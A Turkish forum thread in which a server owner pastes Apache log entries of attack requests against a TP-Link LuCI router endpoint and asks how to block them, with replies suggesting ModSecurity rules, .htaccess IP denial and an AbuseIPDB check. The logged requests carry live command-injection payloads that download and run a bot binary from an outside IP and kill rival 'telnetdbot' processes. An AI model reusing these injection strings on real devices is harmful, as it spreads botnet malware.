141.98.83.197 - - [30/Jun/2024:18:54:36 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3 E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+ chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1057 "-" "Go-http-client/1.1"
--
141.98.83.197 - - [30/Jun/2024:18:54:36 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3 E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D% 3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%2 2%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2 Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5 B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+ %22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1057 "-" "Go-http-client/1.1"
anlık olarak bu tür saldırılar alıyorum nereden deniyor bilmiyor bu sistem açığını nasıl kapatabilirim veya nasıl engellerim cf waf ile engelleyemedim bu konu hakkında fikir sahibi olan var mı
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(ps -ef | grep telnetdbot | grep -v grep | awk '{print $2}' | xargs -r kill -9)
xampp veya sistem açığı
6
●228
- 30-06-2024, 19:38:28https://www.abuseipdb.com/check/141.98.83.197 modsecurity ile engellediklerini yazmışlar
- 30-06-2024, 19:51:02Hocam şöyle bir şey daha var ve dediğiniz tam olarak ne oluyor.
141.98.83.197 - - [30/Jun/2024:19:19:31 +0300] "POST /cgi-bin/skk_set.cgi HTTP/1.1" 404 1057 "-" "Go-http-client/1.1"
Bu konulara biraz uzağım mazur görün. Açıkcası biraz tedirginim koşa koşa bilgilerinize sığınarak buraya geldim. - 30-06-2024, 20:26:21Bu da aynı ipden gelmiş bir istek modsecurity apachenin wafı google a apache modsecurity installation yazarsanız kurulum videolarına erişebilirsinizertaytw adlı üyeden alıntı: mesajı görüntüle
Attığım link ise istek gönderen ipyi bildiren kişiler linkteki yorumları okuyarak daha detaylı bilgi sahibi olabilirsiniz - 01-07-2024, 14:24:50Merhaba,
Bu tür zafiyet testleri veya girişimleri public sunucular / sistemler için her zaman olacaktır maalesef. GET istekler 404 e düşmüş ama ya düşmeseydi veya düşmediyse de farklı bir get istek amacına ulaştıysa diye düşünüyorsanız ya .htaccess üzerinden ip veya subnet deny edeceksiniz yada mod_sec kurulu ise SecRule REQUEST_URI ile ayrı bir mod_sec rule oluşturacaksınız.
İyi çalışmalar.